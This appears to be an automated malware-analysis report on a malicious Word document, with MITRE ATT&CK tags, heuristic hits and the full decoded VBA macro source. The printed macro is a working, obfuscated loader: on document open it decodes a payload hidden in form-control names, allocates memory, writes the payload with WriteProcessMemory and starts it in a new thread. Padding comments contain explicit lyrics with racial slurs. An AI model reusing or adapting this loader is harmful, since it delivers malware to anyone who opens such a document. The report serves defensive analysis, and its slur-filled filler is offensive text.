MALICIOUS
Risk Score: 130
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The presence of the 'WriteProcessMemory' API reference and a 'Document_Open' macro strongly suggests the macros are designed to execute code. The VBA script itself is heavily obfuscated, but its structure and the heuristic firings indicate it likely attempts to download and execute a second-stage payload, aligning with common macro-based malware delivery techniques.
Heuristics (5)
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY): reference to the WriteProcessMemory API.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched lines in script:
  Dim wdApp As Word.Application
  Set wdApp = GetObject(, "Word.Application")
  wdApp.ActiveDocument.Close
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
  End Function
  Private Sub Document_Open()
  Dim mailbag As Byte
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14998 bytes |

SHA-256 of macros.bas: 71a7d190142ca730d2b2d3027cb760b268ce757ec1d97de47aa927571f8d90ad

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function notornis(salable)
Dim measureless As String
Dim humane As Long
Dim glaze As Integer
Dim bullfighter As Variant
#If Win64 Then
Dim majorana As Long
Dim catchweed As LongPtr
dramatically = 8
Dim divvy As Byte
Dim aerated As LongPtr
Dim campbell As Byte
Dim heterospory As LongPtr
Dim detach As Byte
#Else
Dim knowing As Integer
Dim catchweed As Long
dramatically = 4
Dim aerated As Long
Dim patchy As Long
Dim heterospory As Long
Dim composing As Variant
Dim bluewing As String
#End If
unicorn = dendrite(VarPtr(catchweed), VarPtr(salable) + 8, dramatically)
melibean = -1
aerated = 38 - 70 + 32
lantana = 93 - 78 - 15
heterospory = 96 + 121 + 1 + 9341
oxytetracycline = 89 + 4007
anthropophagous = 64
dissuaded = introduced(ByVal melibean, aerated, ByVal lantana, heterospory, ByVal oxytetracycline, ByVal anthropophagous)
myology = firmness * 3
firmness = myology - 385
dendrite aerated, catchweed, 122 + 62 + 5410
scaphopod = 32
conglaciation = 22999
cliff = 395792
pigeonholes = SLN(cliff, conglaciation, scaphopod)
notornis = aerated
End Function
Function dendrite(napping, cyclosorus, atomistic)
#If Win64 Then
Dim acerbity As Integer
Dim cithern As String
Dim knesset As LongPtr
Dim chevrotain As LongPtr
Dim calcitic As LongPtr
Dim bothy As Integer
Dim dininghall As LongPtr
Dim interlocution As LongPtr
#Else
Dim chevrotain As Long
Dim beati As String
Dim knesset As Long
Dim urd As String
Dim dininghall As Long
Dim eel As Long
Dim calcitic As Long
Dim badinage As Variant
Dim interlocution As Long
Dim viscometric As Integer
Dim aster As String
#End If
derri = "manor"
derri = houselights
chevrotain = napping
interlocution = atomistic
chattanooga = chattanooga
dininghall = cyclosorus
katharevusa = 113
sadist = 6979
taught = 321222
sadist = Pmt(0.0507, katharevusa, -36992, taught, 1)
derri = derri
knesset = 121 - 122
ceibo ByVal knesset, chevrotain, dininghall, interlocution, calcitic
myology = Int(236.76 + 252.122)
End Function
Private Sub Document_Open()
Dim mailbag As Byte
Dim disloyalty As Variant
dismount = "marattiales"
entrails
mysticism = 33
cerussite = 15249
lifelike = 111611
roridulaceae = SLN(lifelike, cerussite, mysticism)
End Sub
Sub main()
Dim wdApp As Word.Application
Set wdApp = GetObject(, "Word.Application")
wdApp.ActiveDocument.Close
'or
wdApp.Documents("Arrays.docx").Close
End Sub
Sub entrails()
Dim lyrical As String
Dim lassoo As Variant
enviable = ThisDocument.ComputeStatistics(wdStatisticPages)
Set planation = xerophyllum.Controls.Item(enviable - 2).Tabs
For Each amber In planation
garishness = 24
furrow = 23488
colutea = 225778
outre = SLN(colutea, furrow, garishness)
If amber.Index = 11 Then
standoffishly = "terror"
microsecond = "sparidae"
divert = amber.Name
End If
Next
monocotyledones = 16 - 25 + 39 + 7430
erosgr = Right(divert, monocotyledones)
brainstem = separately.intelligent(erosgr)
adam = 12
im = 32409
unsullied = 123269
crater = SLN(unsullied, im, adam)
eurafrican = "chickadee"
#If Win64 Then
Dim canterbury As Variant
Dim vol As LongPtr
Dim nicandra As LongPtr
Dim hel As Long
#Else
Dim decollation As Byte
Dim nicandra As Long
Dim erastian As Byte
Dim vol As Long
#End If
unwillingness = 6 + 55 - 102 + 41
caustically = "buzz"
dawplucker = "otia"
mattock = 36 + 4060
auspices = 15
alternateness = 21897
sky = 165506
autogamy = SLN(sky, alternateness, auspices)
aesop = "hypercritical"
worshipper = "chronographer"
blanquillo = "laparoscope"
bethrall = "euterpe"
sisyphean = 11
inceptor = 30359
grasseating = 467111
inceptor = Pmt(0.065, sisyphean, -24953, grasseating, 0)
handiwork = brainstem
rachidian = "ba" & "rrels"
vol = notornis(handiwork)
melanoderma = "guisard"
nitrous = "be" & "llero" & "phon"
#If Win64 Then
Dim steamer As String
Dim allign As LongPtr
conform = "nineteen"
enshrine = "ab" & "ruption"
suffocate = "aures"
Dim legem As LongPtr
saxifraga = 112 + 1168
#ElseIf Win32 Then
byword = "descendant"
pesthole = "ig" & "norantness"
Dim allign As Long
unilateralism = 38 - 101 + 577
Dim legem As Long
saxifraga = unilateralism + 3204
#End If
Dim wrinkle As Byte
Dim liberalism As Variant
allign = 5 - 93 + 88
nicandra = vol + saxifraga
legem = 1
snarl = counterbalance(nicandra, allign, legem, allign)
atmospheric = 90
preconception = 24066
aedile = 573069
preconception = Pmt(0.0504, atmospheric, -29912, aedile, 1)
End Sub
Attribute VB_Name = "separately"
' Bitch I've been tight since "Guiding light",
' I ain't really mean to say on my dick
' Lil nigga bigger than gorilla
#If Win64 Then
' I'm done
' Your girlfriend a freak like Cirque Du Soleil
' You ain't hotter than mine, nope, not on my time and I'm not even trying
Public Declare PtrSafe Function alternativeness Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (success As LongPtr, fryer As Any,affect As LongPtr, adv As Any) As Boolean
' Let's go!
' I ain't really mean to say on my dick
' When you're doing that thing over there homie
Public Declare PtrSafe Function badaga Lib "Shell32.dll" Alias "SHGetDesktopFolder" (basics As LongPtr)
' Man fuck these bitch ass niggas, how y'all doin'?
' Dress like a skater, got a big house, came with an elevator
' Yeah, fresher than a motherfucker
Public Declare PtrSafe Function perceivable Lib "Kernel32.dll" Alias "GetSystemTime" (papaver As LongPtr) As Boolean
' Every time I come a nigga gotta set it, then I gotta go, and then I gotta get it
' I'm Lil Tunechi, I'm a nuisance, I go stupid, I go dumb like the 3 stooges
' Oh, I'm getting paper
Public Declare PtrSafe Function abbreviation Lib "Kernel32.dll" Alias "LocalFree" (sulfate As LongPtr) As LongPtr
' And niggas know that I'm the best when it come to doing this
' Oh, I'm getting paper
' If you get what I get, what would you say?
Public Declare PtrSafe Function introduced Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (factfinding As LongPtr, femtogram As LongPtr, ByVal oneliner As LongPtr,fitnessByVal As LongPtr, dissolution As LongPtr, ByVal ashkhabad As LongPtr) As LongPtr
' Your girlfriend a freak like Cirque Du Soleil
' Cause I'm killing every nigga that come try to be on my shit
' Gotta taste it and I gotta grab it
Public Declare PtrSafe Function counterbalance Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal vicinism As LongPtr, ByVal aphaeresis As Any, ByVal admissibility As LongPtr, ByVal hottonia As LongPtr) As LongPtr
' Oh, look at me now
' Oh, I'm getting paper
' I don't eat sushi, I'm the shit, no I'm pollution, no substitution
Public Declare PtrSafe Function ceibo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal river As Any, ByVal connect As Any, ByVal colature As Any, ByVal nymphomaniacal As Any, ByVal alveolus As Any) As LongPtr
' And my mamma's nice and my daddy's dead
' Do you really wanna know what's next? Let's go
' Oh, look at me now
Public Declare PtrSafe Function manibus Lib "Shell32.dll" Alias "SHGetSettings" (bvds As LongPtr,commissionaire As LongPtr) As LongPtr
' And I know that I can be a little cocky
' I never gave a fuck about a hater, got money on my radar
' And we always gotta do it take it to another place
' Ciroc and Sprite on a private flight,
' See the way we on it and we all up in the race and you know
' I ain't really mean to say on my dick
#Else
' You niggas ain't eatin', fuck it, tell a waiter
' You will hear it in the street or you can read it in the press
' And we always gotta do it take it to another place
Public Declare Function quadriplegic Lib "Kernel32.dll" Alias "SetSystemTime" (associate As Long) As Boolean
' Your girlfriend a freak like Cirque Du Soleil
' And we struggle and I hustle and I set it and I get it
' Oh, look at me now
Public Declare Function sticking Lib "Shell32.dll" Alias "SHGetSettings" (disreputable As Long, narrowminded As Long) As Long
' Oh, I'm getting paper
' If you get what I get, what would you say?
' Gotta taste it and I gotta grab it
Public Declare Function introduced Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mitigated As Long, arkansan As Long, ByVal beckett As Long, informativelyByVal As Long, vitiligo As Long, ByVal minster As Long) As Long
' Got a bitch that play in movies in my Jacuzzi, pussy juicy
' I was like fuck trial I puts it down
' I get what you get in 10 years, in two days
Public Declare Function hemic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (abelmoschus As Long)
' Bitch I've been tight since "Guiding light",
' And she accidentally slip and fall on my dick
' Yellow top missing
Public Declare Function counterbalance Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal unreported As Long, ByVal chaserbalancer As Any, ByVal magnificio As Any, ByVal disgraceful As Any) As Long
' Look at me now
' That I always win and then I gotta get it again, and again, and then again
' If you want that bullshit then I'm like "Olé"
Public Declare Function monotreme Lib "Kernel32.dll" Alias "LocalFree" (bonheur As Long) As Long
' Yeah, fresher than a motherfucker
' Just to be at the top of the throne
' Let me show you how to keep the dice rolling
Public Declare Function ceibo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal temperate As Any, ByVal cadastre As Any, ByVal angiitis As Any, ByVal omnigenous As Any, ByVal amical As Any) As Long
' See the way we on it and we all up in the race and you know
' If you want that bullshit then I'm like "Olé"
' Look at me now, look at me now
Public Declare Function dasher Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (tradition As Long, abends As Any, demagogy As Long, agonidae As Any) As Boolean
' Marley said, "Shoot 'em," and I said, "OK"
' Hell, Breezy
' I'm so Young Money, if you got eyes look at me now, bitch
' Just know that you will never flop me
' What's poppin' Slime? Nothin' five, and if they trippin' fuck 'em five
' Cause I'm feeling like I'm running
#End If
' Oh, look at me now
' And my mamma's nice and my daddy's dead
' Cause I'm killing every nigga that come try to be on my shit
Function bilander()
Dim corozo(255) As Byte
debilitate = 65
Do
corozo(debilitate) = debilitate - 65
debilitate = debilitate + 1
Loop Until debilitate = 91
debilitate = 48
Do
corozo(debilitate) = debilitate + 4
debilitate = debilitate + 1
Loop Until debilitate = 58
debilitate = 97
Do
corozo(debilitate) = debilitate - 71
debilitate = debilitate + 1
Loop Until debilitate = 123
corozo(47) = 63
debilitate = 43
corozo(debilitate) = 62
bilander = corozo
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Function mock(outdoor)
mock = AscW(outdoor)
End Function
Function bryon(popular, uncrown, amaethon)
Select Case amaethon
Case 1
bryon = popular \ uncrown
Case 2
bryon = popular And uncrown
Case 3
bryon = popular * uncrown
End Select
End Function
Function intelligent(kranke) As String
firmness = Round(315.106 + 383.643)
Dim sweeper(63) As Long
derri = conservatively
Dim epimetheus(6965) As Byte
Dim corsican As Long
Dim absolutism As Integer
Dim birds As Long
Dim chloroform(63) As Long
Dim elderberry As String
Dim michaelmas As Long
myology = Int(148.158 + 73.244)
Dim literature() As Byte
Dim combretaceae(63) As Long
Dim uneared As Long
Dim tashmit As Integer
Dim balkline As Integer
Dim ca As Integer
intercept = 55 + 66 - 57
asia = 65280
gelechiid = 16711680
dio = 262144
sunfish = 118 + 94 + 16514860
unitarian = 4096
Dim beau As Long
Dim timbal As Long
brandyball = 31 + 65505
Dim operetta As Long
goitrogen = 80 + 36 + 10 + 3906
denominationally = 128 + 76 + 52
homestretch = 255
bedevil = 73 + 76 + 95 - 181
duplicable = 69 + 257979
Dim interclusion As Integer
courser = 0
hugmetight = 87 - 5 - 6 + 7383
Dim appreciable() As Byte
appreciable = VBA.StrConv(kranke, vbFromUnicode)
Dim disastrous As Byte
opposable = 24
dipterocarpaceae = 26476
northeastward = 225412
altruist = SLN(northeastward, dipterocarpaceae, opposable)
corticoafferent = 7459
gern = 50 - 15
autochthonous = Log(100) / Log(10) + 13
For vicissitude = 0 To corticoafferent
If vicissitude Mod 2 = 0 Then
appreciable(vicissitude) = appreciable(vicissitude) + autochthonous
Else
appreciable(vicissitude) = appreciable(vicissitude) + autochthonous - 1
End If
Next vicissitude
orthopedist = 35
opinionatist = 32823
atypicality = 275674
opinionatist = Pmt(0.0572, orthopedist, -38266, atypicality, 1)
balkline = 0
monarda = 50 + 103 - 153
bradypus = 43
mightiness = bilander
For uneared = 0 To 63
chloroform(uneared) = bryon(uneared, intercept, 3)
sweeper(uneared) = bryon(uneared, unitarian, 3)
combretaceae(uneared) = bryon(uneared, dio, 3)
Next uneared
bemisia = 48
scrawl = 33442
cabbage = 567850
rejected = SLN(cabbage, scrawl, bemisia)
literature = appreciable
calender = 24 + 75 + 61 - 156
caulophyllum = 9
arrogantly = 15522
chivalrous = 507456
arrogantly = Pmt(0.0578, caulophyllum, -26150, chivalrous, 1)
damnee = 3
houselights = "inhuman"
chattanooga = chattanooga
accused = damnee + 1
caboose = 32 - 69 + 39
For michaelmas = 0 To corticoafferent
etiological = literature(michaelmas)
selftormentor = literature(michaelmas + 2)
corsican = combretaceae(mightiness(etiological)) _
+ sweeper(mightiness(literature(michaelmas + 1))) + chloroform(mightiness(selftormentor)) + mightiness(literature(michaelmas + damnee))
uneared = bryon(corsican, gelechiid, 2)
epimetheus(birds) = bryon(uneared, brandyball, 1)
uneared = bryon(corsican, asia, 2)
epimetheus(birds + 1) = bryon(uneared, denominationally, 1)
epimetheus(birds + caboose) = bryon(corsican, homestretch, 2)
birds = birds + caboose + 1
michaelmas = michaelmas + 3
Next
intelligent = epimetheus
End Function
Attribute VB_Name = "xerophyllum"
Attribute VB_Base = "0{4B935E51-090F-483B-B508-B8EBE2D1725F}{DFBD2468-079D-4270-8119-5A7CB14B5FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False